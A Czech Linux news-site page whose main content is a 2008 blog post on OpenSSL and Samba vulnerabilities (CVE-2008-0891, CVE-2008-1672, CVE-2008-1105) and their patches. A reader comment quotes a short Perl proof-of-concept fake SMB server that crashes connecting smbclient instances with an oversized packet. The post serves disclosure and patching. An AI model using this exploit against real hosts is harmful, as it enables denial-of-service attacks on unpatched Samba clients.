abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
dnes 19:33 | Zajímavý software

OpenRGB (dříve OpenAuraSDK) je nový svobodný software (verze 0.1) umožňující nastavení podsvícení řady různých „herních“ komponent a periferií (dokáže se také integrovat s projektem OpenRazer); seznam již podporovaného hardwaru je ve wiki projektu.

Fluttershy, yay! | Komentářů: 0
dnes 15:33 | Zajímavý článek

Sergio Prado v článku Jak se testuje jádro Linux? poskytuje přehled nástrojů používaných právě k testování Linuxu, a to v oblastech statické analýzy kódu, automatizovaného testování a průběžné integrace.

Fluttershy, yay! | Komentářů: 0
dnes 15:22 | Nová verze

Byla vydána verze 0.20.0 open source počítačového planetária Stellarium (Wikipedie). Proběhlo refaktorování kódu. Vylepšeno bylo GUI. Vyzkoušet lze webovou verzi Stellarium Web.

Ladislav Hagara | Komentářů: 1
dnes 07:00 | Nová verze

Byla vydána verze 0.5.5 klienta open source herní platformy pro Linux Lutris (Wikipedie). Přehled novinek na GitHubu. Zmínit lze například počáteční podporu Humble Bundle.

Ladislav Hagara | Komentářů: 0
dnes 06:00 | Nová verze

Po 9 týdnech vývoje od vydání Linuxu 5.5 oznámil Linus Torvalds vydání Linuxu 5.6 (LKML). Přehled nových vlastností a vylepšení na stránkách LWN.net (1, 2) a Linux Kernel Newbies. Zdůraznit lze začlenění WireGuardu. Kódové jméno Linuxu 5.6 zůstává Kleptomaniac Octopus.

Ladislav Hagara | Komentářů: 13
včera 19:33 | Nová verze

Byla vydána nová major verze 2.9.0 multiplatformního svobodného frameworku pro zpracování obrazu G'MIC (GREYC's Magic for Image Computing, Wikipedie). Přehled novinek i s náhledy na PIXLS.US. Zmínit lze například generování moaré animací. Ukázka na YouTube.

Ladislav Hagara | Komentářů: 0
28.3. 17:33 | Zajímavý článek

Nová čísla časopisů od nakladatelství Raspberry Pi: MagPi 91 (pdf) a 92 (pdf), HackSpace 29 (pdf), Hello World 12 (pdf), Wireframe 33 (pdf), 34 (pdf) a 35 (pdf).

Ladislav Hagara | Komentářů: 1
28.3. 16:11 | IT novinky

Společnost FriendlyElec začala prodávat svůj nejnovější miniaturní jednodeskový počítač NanoPi R2S. Počítač v ceně 22 dolarů zaujme především dvěma Gigabit Ethernet porty.

Ladislav Hagara | Komentářů: 39
27.3. 07:00 | Zajímavý článek

David Malcolm se ve svém příspěvku na blogu vývojářů Red Hatu rozepsal o statické analýze a nové volbě -fanalyzer v GCC 10. Ukázkové příklady lze vyzkoušet také online na stránce Compiler Explorer.

Ladislav Hagara | Komentářů: 1
26.3. 20:22 | IT novinky

Český hydrometeorologický ústav doposud poskytoval data z meteorologických měření pouze za úplatu, přestože jde o veřejnou instituci. Dlouhodobě se tím zabýval Jan Cibulka, datový novinář Českého rozhlasu. Dosavadní praxe se však nyní mění – Cibulka syrová historická data získal a zveřejnil včetně vzorové žádosti dle zákona o právu na informace o životním prostředí. Podle chystaného zákona o zabezpečení hydrometeorologické služby by měla odpadnout i nutnost o data explicitně žádat.

Fluttershy, yay! | Komentářů: 67
Se kterými dopady COVID-19 už jste se přímo osobně setkali?
 (3%)
 (54%)
 (38%)
 (38%)
 (37%)
 (6%)
 (20%)
Celkem 433 hlasů
 Komentářů: 43, poslední včera 20:38
Rozcestník

OpenSSL a Samba / bezpečnostní problémy

28.5.2008 18:35 | Přečteno: 1934× | GNU/Linux | poslední úprava: 29.5.2008 17:57


Dnes byly zveřejněny bezpečnostní problémy v OpenSSL SecurityFocus bid 29405 a Sambě SecurityFocus bid 29404. Nová verze OpenSSL 0.9.8h opravuje dva bezpečnostní problémy. Jde o CVE-2008-0891 a CVE-2008-1672. Pokud byla knihovna OpenSSL přeložena s rozšířením "TLS server name" (implicitně vypnuto), může útočník na dálku shodit serverovou službu využívající této knihovny. Druhý problém může být pro změnu zneužít obráceně. Klientská aplikace může být shozena (crash) zákeřným serverem při navazování šifrované komunikace.

Ukázky shození openssl jak klienta (openssl s_client ...), tak i serveru (openssl s_server ...), například na CERT-FI.

Samba dnes také nebyla ušetřena. V oznámení na stránce Secunia.com se píše o přetečení (Buffer Overflow) ve funkci receive_smb_raw() v souboru lib/util_sock.c. Problém byl vývojářům Samby oznámen 15. května a dnes 28. května byl oficiálně zveřejněn. Jedná se o bezpečnostní problém CVE-2008-1105.

V případě, že lze klientskou část obelstít a přinutit ji k navázání spojení se zákeřným serverem, například pouhým kliknutím na odkaz "smb://" nebo zasláním speciálně upraveného datového bloku nmbd serveru, lze ji také (i když zatím pouze teoreticky) přinutit spustit libovolný kód.

Poněvadž serverová část, speciálně proces smbd, může být současně klientem, týká se tento bezpečnostní problém také Samba serveru.

V linuxových distribucích se postupně objevují bezpečnostní aktualizace.
Například RedHat Bug 446724 a bezpečnostní oznámení RHSA-2008-0288 a RHSA-2008-0290.

K dispozici je už také nová verze Samby 3.0.30.

       

Hodnocení: 100 %

        špatnédobré        

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Vložit další komentář

2.6.2008 12:46 Ladislav Hagara | skóre: 91 | blog: Ride the Raven
Rozbalit Rozbalit vše Re: OpenSSL a Samba / bezpečnostní problémy
Bugtraq ID 29404 (SAMBA) zmiňuje následující POC (Proof Of Concept).
#!/usr/bin/perl
# 06/01/2008 - k`sOSe
#
# ~ # smbclient //localhost/w00t
# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 ***
#

use warnings;
use strict;
use IO::Socket;


my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!);

while(my $csock = $sock->accept())
{
	print $csock	"\x00" .
			"\x01\xff\xff" .
			"\x41" x 131071;
			
}
ISSN 1214-1267   www.czech-server.cz
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.